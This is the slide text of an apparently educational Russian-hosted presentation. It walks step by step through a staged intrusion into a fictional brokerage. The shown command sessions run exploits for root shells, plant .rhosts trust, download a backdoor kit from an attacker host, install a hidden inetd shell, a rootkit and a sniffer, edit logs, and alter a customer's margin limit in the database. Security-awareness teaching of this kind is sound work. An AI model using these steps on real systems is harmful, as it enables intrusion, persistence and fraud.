Что такое findslide.org?

FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.


Для правообладателей

Обратная связь

Email: Нажмите что бы посмотреть 

Яндекс.Метрика

Презентация на тему Пример сетевой атаки

Содержание

ACMETRADE.COM
Пример атаки ACMETRADE.COM Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM)  6600 Peachtree Dunwoody Road  Atlanta, GA 30338 hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker> hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source port ##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21 ####rpcinfo -p www.acmetrade.com | grep mountd100005  1  udp  643 nfs nfsshell.c /data1		server2/a		engineering/b		engineering/c		engineering/export/home	(everyone)Export list for www1.acmetrade.com:nfs>mount /export/homeMount www1.acmetrade.com[208.21.2.12]:/export/homenfs>lsbill bobcelestechuckdandavejennzacknfs>ls –l bobdrwxr-xr-x 2 nfs>statusUser id   : 201Group id   : 1Remote host www1%www1%ls -la /usr/bin/eject-r-sr-xr-x  1 root   bin ftp>cd solaris_backdoors250 CWD command successful.ftp>get solaris_backdoor.tar.gz200 PORT command successful.150 Binary data connection #cd /tmp/my_tools/module_backdoor#./configureEnter directories and filenames to hide from ls, find, du:#makegcc -c #ls -la /usr/local/share/......: No such file or directory######./installer backdoor /usr/local/share/.../backdoorInstalling file...Fixing last #netstatTCP  Local Address    Remote Address  Swind Send-Q Trying 208.21.2.12...Escape character is '^]'.telnet www1.acmetrade.com 31337Granting rootshell...#hostnamewww1#whoamiroot##ps –aef | grep inetdroot hacker:/export/home/hacker>ftp www1.acmetrade.comConnected to www1220 www1.acmetrade.com FTP service (Version 2.5).Name:root331 Password required for program vers proto  port service  100000  4 100021  3  udp  4045 nlockmgr  100021 Please wait for your root shell.#./tt backoffice.acmetrade.comhostnamebackofficewhoamiroot#find / -type f -name .rhosts #sqlplus oracle/oracleSQL>describe customersName		Null?	Type------------------ -------- -----------LNAME		NOT NULL 	VARCHAR2(20)FNAME		NOT NULL 	VARCHAR2(15)ADDR1		NOT NULL 	VARCHAR2(30)ZIP		NOT NULL Anatomy of the AttackAcmeTrade’s NetworkUNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIX IT InfrastructureFirewallE-Mail ServerWeb ServerRouterServersClients & WorkstationsNetworkWhat is Vulnerable? ApplicationsRouterE-CommerceWeb ServerE-Mail ServerFirewallSAPPeoplesoftWeb BrowsersWhat is Vulnerable? DatabasesFirewallRouterOracleMicrosoftSQL ServerSybaseWhat is Vulnerable? FirewallAIXSolarisRouterWindows NTNetworkOperating SystemsHP-UXWindows 95 & NTWhat is Vulnerable? FirewallE-Mail ServerWeb ServerRouterServersNetworksTCP/IPNetwareWhat is Vulnerable?
Слайды презентации

Слайд 2


Слайд 4 ACMETRADE.COM

ACMETRADE.COM

Слайд 5 Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road

Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain

Atlanta, GA 30338

Domain Name: ACMETRADE.COM

Administrative Contact:
Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM
(678)443-6000 (FAX) (678) 443-6476
Technical Contact, Zone Contact:
Bergman, Bret (ET2324) bbergman@ACMETRADE.COM
(678)443-6100 (FAX) (678) 443-6208
Billing Contact:
Fields, Hope (ET3427) hfields@ACMETRADE.COM
(678)443-6101 (FAX) (678) 443-6401

Record Last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT

Domain servers in listed order:

dns.acmetrade.com 208.21.2.67
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com


Слайд 6 hacker:/export/home/hacker>
./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is

hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker>

on port 33505
hacker:/export/home/hacker>


Слайд 9 hacker:/export/home/hacker>
id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker>
uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc

hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source

SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created

on port 33505

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505


Слайд 10 #
#
nslookup
Default Server: dns.acmetrade.com
Address: 208.21.2.67
>
>
ls acmetrade.com
Received 15 records.
^D
[dns.acmetrade.com]
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103
margin.acmetrade.com 208.21.4.10
marketorder.acmetrade.com 208.21.2.62
deriv.acmetrade.com 208.21.2.25
deriv1.acmetrade.com 208.21.2.13
bond.acmetrade.com 208.21.2.33
ibd.acmetrade.com 208.21.2.27
fideriv.acmetrade.com 208.21.4.42
backoffice.acmetrade.com 208.21.4.45
wiley.acmetrade.com 208.21.2.29
bugs.acmetrade.com 208.21.2.89
fw.acmetrade.com 208.21.2.94
fw1.acmetrade.com 208.21.2.21

##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21

Слайд 11 #
#
#
#
rpcinfo -p www.acmetrade.com | grep mountd
100005 1

####rpcinfo -p www.acmetrade.com | grep mountd100005 1 udp 643 mountd100005 1

udp 643 mountd
100005 1 tcp

647 mountd

showmount -e www.acmetrade.com

/usr/local server2, server3, server4
/export/home sunspot

rpcinfo -p www1.acmetrade.com | grep mountd

100005 1 udp 643 mountd
100005 1 tcp 647 mountd

showmount -e www1.acmetrade.com

/data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)

export list for www.acmetrade.com:

#


Слайд 13 nfsshell.c

nfsshell.c

Слайд 14 /data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)
Export list for www1.acmetrade.com:
nfs>
mount /export/home
Mount www1.acmetrade.com[208.21.2.12]:/export/home
nfs>
ls
bill
bob
celeste
chuck
dan
dave
jenn
zack
nfs>
ls –l

/data1		server2/a		engineering/b		engineering/c		engineering/export/home	(everyone)Export list for www1.acmetrade.com:nfs>mount /export/homeMount www1.acmetrade.com[208.21.2.12]:/export/homenfs>lsbill bobcelestechuckdandavejennzacknfs>ls –l bobdrwxr-xr-x 2

bob
drwxr-xr-x 2 201 1

1024 May 4 1999 bob

- protocol: UDP/IP
- transfer size: 8192 bytes

nfs>

nfs>

nfs>

cd bob

uid 201

gid 1

#

nfsshell

nfs>

host www1.acmetrade.com

Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP

nfs>

export


Слайд 15 nfs>
status
User id : 201
Group id

: 1
Remote host : ‘www1.acmetrade.com’
Mount path :

‘/export/home’
Transfer size: 8192

nfs>

!sh

$

echo "+ +" > .rhosts

$

exit

nfs>

nfs>

put .rhosts

cat .rhosts

+ +

nfs>

exit

#

rlogin -l bob www1.acmetrade.com

Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com

www1%

whoami

bob

www1%

pwd

/export/home/bob

www1%

uname -a

SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000

www1%

cat .rhosts

+ +


Слайд 18 www1%
www1%
ls -la /usr/bin/eject
-r-sr-xr-x 1 root

www1%www1%ls -la /usr/bin/eject-r-sr-xr-x 1 root  bin  13144 Jul 15

bin 13144 Jul 15 1997 /usr/bin/eject*
www1%
gcc

-o eject_overflow eject_overflow.c

www1%

./eject_overflow

Jumping to address 0xeffff630 B[364] E[400] SO[400]

#

whoami

root

#

ftp evil.hacker.com

Connected to evil.hacker.com.

Name (evil.hacker.com:root):

331 Password required for hacker.

Password:

230 User hacker logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

hacker

eye0wnu

220 evil.hacker.com FTP server (HackerOS) ready.


Слайд 19 ftp>
cd solaris_backdoors
250 CWD command successful.
ftp>
get solaris_backdoor.tar.gz
200 PORT command

ftp>cd solaris_backdoors250 CWD command successful.ftp>get solaris_backdoor.tar.gz200 PORT command successful.150 Binary data

successful.
150 Binary data connection for out 3.1.33.7,1152).
226 Transfer complete.
152323

bytes sent in 31.942233 secs (4.7Kbytes/sec)

ftp>

quit

tar -xf module_backdoor.tar

cd /tmp/my_tools

gunzip module_backdoor.tar.gz

#

#

#


Слайд 20 #
cd /tmp/my_tools/module_backdoor
#
./configure
Enter directories and filenames to hide from

#cd /tmp/my_tools/module_backdoor#./configureEnter directories and filenames to hide from ls, find, du:#makegcc

ls, find, du:
#
make
gcc -c backdoor.c
gcc -o installer installer.c
ld –o

backdoor –r backdoor.o

#

Makefile
backdoor
backdoor.c
backdoor.o
config.h
configure
installer
installer.c

ls

#

#

modload backdoor

./installer -d /usr/local/share/...

Adding directory...
Fixing last modified time...
Fixing last accessed time...

... backdoor

Enter class C network to hide from netstat:

Enter process names to hide from ps and lsof:

creating config.h...

3.1.33.0

sniffer


Слайд 21 #
ls -la /usr/local/share/...
...: No such file or directory
#
#
#
#
#
#
./installer

backdoor /usr/local/share/.../backdoor
Installing file...
Fixing last modified time...
Fixing last accessed time...
echo

"/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd

#

cd ..

rm -rf module_backdoor

ls

inetd_backdoor/
logedit
sniffer

./installer sniffer /usr/local/share/.../sniffer

Installing file...
Fixing last modified time...
Fixing last accessed time...

ls /usr/local/share/.../sniffer

/usr/local/share/.../sniffer: No such file or directory

#

cd /usr/local/share/...

#

./sniffer > out &

#

ps -aef | grep sniffer

#


Слайд 22 #
netstat
TCP
Local Address Remote

#netstatTCP Local Address  Remote Address Swind Send-Q Rwind Recv-Q State--------------------

Address Swind Send-Q Rwind Recv-Q State
-------------------- -------------------- -----

------ ----- ------ -------
208.21.2.10.1023 208.21.0.19.2049 8760 0 8760 648 ESTABLISHED
208.21.2.10.1022 208.21.0.19.2049 8760 0 8760 0 ESTABLISHED
208.21.2.10.2049 208.21.0.13.1003 8760 0 8760 0 ESTABLISHED

#

cd /tmp/my_tools

#

cd inetd_backdoor

#

ls

config.h
configure
inetd.c
installer.c

#

./configure

Enter port for hidden shell:

#

make

gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv
gcc -o installer installer.c

#

installer inetd /usr/sbin/inetd

Installing file...
Fixing last modified time...
Fixing last accessed time...

creating config.h...
creating Makefile...

31337


Слайд 23 Trying 208.21.2.12...
Escape character is '^]'.
telnet www1.acmetrade.com 31337
Granting rootshell...
#
hostname
www1
#
whoami
root
#
#
ps

Trying 208.21.2.12...Escape character is '^]'.telnet www1.acmetrade.com 31337Granting rootshell...#hostnamewww1#whoamiroot##ps –aef | grep

–aef | grep inetd
root 179 1

0 May 10 ? 1:26 /usr/sbin/inetd -s

#

#

kill –9 179

#

exit

/usr/sbin/inetd –s &

Connection closed by foreign host.

hacker:/export/home/hacker>


Слайд 24 hacker:/export/home/hacker>
ftp www1.acmetrade.com
Connected to www1
220 www1.acmetrade.com FTP service (Version

hacker:/export/home/hacker>ftp www1.acmetrade.comConnected to www1220 www1.acmetrade.com FTP service (Version 2.5).Name:root331 Password required

2.5).
Name:
root
331 Password required for root.
Password:
*******
230 User root logged in.
Remote

system type is Unix.

ftp>

put backdoor.html securelogin.html

200 PORT command successful.

150 Opening BINARY mode data connection for index.html

226 Transfer complete.

ftp>

quit

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html
-rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif
-rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

ftp>

dir

ftp> cd /usr/local/httpd


Слайд 25 program vers proto port service

program vers proto port service 100000 4 tcp 111 rpcbind

100000 4 tcp 111 rpcbind

100000 3 tcp 111 rpcbind
100000 2 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100000 3 udp 111 rpcbind
100000 2 udp 111 rpcbind
100004 2 udp 753 ypserv
100004 1 udp 753 ypserv
100004 1 tcp 754 ypserv
100004 2 tcp 32771 ypserv
1073741824 2 udp 32772
100007 3 udp 32779 ypbind
100007 2 udp 32779 ypbind
100007 1 udp 32779 ypbind
100007 3 tcp 32772 ypbind
100007 2 tcp 32772 ypbind
100007 1 tcp 32772 ypbind
100011 1 udp 32781 rquotad
100068 2 udp 32783
100068 3 udp 32783
100068 4 udp 32783
100068 5 udp 32783
100024 1 udp 32784 status
100024 1 tcp 32777 status
100021 1 udp 4045 nlockmgr
100021 2 udp 4045 nlockmgr

#

rpcinfo -p backoffice.acmetrade.com


Слайд 26
100021 3 udp

100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr

4045 nlockmgr
100021 4 udp

4045 nlockmgr
100021 1 tcp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100021 3 tcp 4045 nlockmgr
100021 4 tcp 4045 nlockmgr
100005 1 udp 33184 mountd
100005 2 udp 33184 mountd
100005 3 udp 33184 mountd
100005 1 tcp 32787 mountd
100005 2 tcp 32787 mountd
100005 3 tcp 32787 mountd
100083 1 tcp 32773
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100227 2 udp 2049 nfs_acl
100227 3 udp 2049 nfs_acl
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100227 2 tcp 2049 nfs_acl
100227 3 tcp 2049 nfs_acl

#

#

grep ttdbserverd /etc/inetd.conf

100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd

rpcinfo -p backoffice.acmetrade.com | grep 100083

100083 1 tcp 32773

#

cd /tmp/mytools/warez


Слайд 27 Please wait for your root shell.
#
./tt backoffice.acmetrade.com
hostname
backoffice
whoami
root
#
find /

Please wait for your root shell.#./tt backoffice.acmetrade.comhostnamebackofficewhoamiroot#find / -type f -name

-type f -name .rhosts -print
/.rhosts
/export/home/chuck/.rhosts
/export/home/bill/.rhosts
/export/home/larry/.rhosts
#
cat /.rhosts
fideriv.acmetrade root
ibd.acmetrade

root
bugs.acmetrade root

#

w

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh
root pts/5 9:24pm /sbin/sh

#

#

#

/tmp/mytools/logedit root pts/5

#

w

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh


Слайд 28 #
sqlplus oracle/oracle
SQL>
describe customers
Name Null? Type
------------------ -------- -----------
LNAME NOT NULL VARCHAR2(20)
FNAME NOT NULL

#sqlplus oracle/oracleSQL>describe customersName		Null?	Type------------------ -------- -----------LNAME		NOT NULL 	VARCHAR2(20)FNAME		NOT NULL 	VARCHAR2(15)ADDR1		NOT NULL 	VARCHAR2(30)ZIP		NOT

VARCHAR2(15)
ADDR1 NOT NULL VARCHAR2(30)
ZIP NOT NULL NUMBER(5)
PHONE NOT NULL CHAR(12)
ACCOUNT_NUM NOT NULL NUMBER(12)
BALANCE NOT

NULL NUMBER(12)
MARGIN_LIMIT NOT NULL NUMBER(12)
ACCT_OPEN NOT NULL DATE
SQL>

select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT
-------------------- ------------- ----------- ------------
Gerulski David 5820981 50000.00
SQL>

update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';

SQL>

select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME MARGIN_LIMIT
------------------- ------------
Gerulski 500000.00
SQL>

exit


Слайд 30 Anatomy of the Attack
AcmeTrade’s Network
UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients

Anatomy of the AttackAcmeTrade’s NetworkUNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIX

& Workstations
Network
UNIX
NT
UNIX


Слайд 31 IT Infrastructure
Firewall
E-Mail Server
Web Server
Router
Servers
Clients & Workstations
Network
What is Vulnerable?

IT InfrastructureFirewallE-Mail ServerWeb ServerRouterServersClients & WorkstationsNetworkWhat is Vulnerable?

Слайд 32 Applications
Router
E-Commerce
Web Server
E-Mail Server






Firewall
SAP
Peoplesoft
Web Browsers
What is Vulnerable?

ApplicationsRouterE-CommerceWeb ServerE-Mail ServerFirewallSAPPeoplesoftWeb BrowsersWhat is Vulnerable?

Слайд 33 Databases
Firewall
Router
Oracle




Microsoft
SQL Server
Sybase
What is Vulnerable?

DatabasesFirewallRouterOracleMicrosoftSQL ServerSybaseWhat is Vulnerable?

Слайд 34 Firewall
AIX
Solaris
Router
Windows NT
Network
Operating Systems





HP-UX
Windows 95 & NT
What is Vulnerable?

FirewallAIXSolarisRouterWindows NTNetworkOperating SystemsHP-UXWindows 95 & NTWhat is Vulnerable?

  • Имя файла: primer-setevoy-ataki.pptx
  • Количество просмотров: 148
  • Количество скачиваний: 0